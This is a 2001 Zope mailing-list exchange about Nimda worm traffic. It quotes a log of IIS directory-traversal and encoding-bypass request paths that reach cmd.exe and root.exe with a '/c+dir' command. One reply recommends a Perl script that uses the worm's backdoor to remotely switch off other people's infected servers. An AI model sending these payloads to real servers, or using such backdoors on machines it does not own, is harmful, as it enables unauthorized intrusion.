[Zope] Zope 1 : NIMDA 0
Michael Montagne
Michael Montagne <montagne@boora.com>
Thu, 20 Sep 2001 14:08:31 -0700
How do you get that log from Zope?
On Thu, Sep 20, 2001 at 08:30:33PM +0000, Reinoud van Leeuwen wrote:
> On 20 Sep 2001 18:28:43 -0000, you wrote:
>
> >Failure Report (9/19/2001 - 24 hour report)
> >Listing the top 30 files by the number of failed requests, sorted by the number of failed requests.
> >
> >reqs: file
> >----: ----
> >1210: /scripts/..%255c../winnt/system32/cmd.exe
> >1210: /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
> >1204: /scripts/..%5c../winnt/system32/cmd.exe
> >1204: /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
> > 615: /scripts/root.exe
> > 615: /scripts/root.exe?/c+dir
> > 611: /MSADC/root.exe
> > 611: /MSADC/root.exe?/c+dir
> > 610: /c/winnt/system32/cmd.exe
> > 610: /c/winnt/system32/cmd.exe?/c+dir
> > 609: /d/winnt/system32/cmd.exe
> > 609: /d/winnt/system32/cmd.exe?/c+dir
> > 608: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe
> > 608: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> > 606: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe
> > 606: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> > 604: /scripts/..%c1%1c../winnt/system32/cmd.exe
> > 604: /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
> > 604: /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe
> > 604: /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
> > 603: /scripts/..%c0%af../winnt/system32/cmd.exe
> > 603: /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
> > 603: /scripts/winnt/system32/cmd.exe
> > 603: /scripts/winnt/system32/cmd.exe?/c+dir
> > 602: /scripts/..%c1%9c../winnt/system32/cmd.exe
> > 602: /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
> > 598: /scripts/..%252f../winnt/system32/cmd.exe
> > 598: /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
> >
> >That is a lot of requests! Glad Zope could handle it.
> >
>
> You can "help" your infected neigbours by remotely turning their
> infected servers off! see
> http://pc.xs4all.nl/default.ida
>
> (it is a Perl script that uses the same backdoor as the virus itself.
> I've not yet installed perl in Zope, but am working on it ";-)
>
> --
> __________________________________________________
> "Nothing is as subjective as reality"
> Reinoud van Leeuwen reinoud@xs4all.nl
> http://www.xs4all.nl/~reinoud
> -> when replying to a mailinglist mail, please do <-
> -> *NOT* cc: me as well. If I read the list I will <-
> -> receive the reply as well! <-
> __________________________________________________
>
> _______________________________________________
> Zope maillist - Zope@zope.org
> http://lists.zope.org/mailman/listinfo/zope
> ** No cross posts or HTML encoding! **
> (Related lists -
> http://lists.zope.org/mailman/listinfo/zope-announce
> http://lists.zope.org/mailman/listinfo/zope-dev )
--
Michael Montagne
montagne@boora.com
http://www.boora.com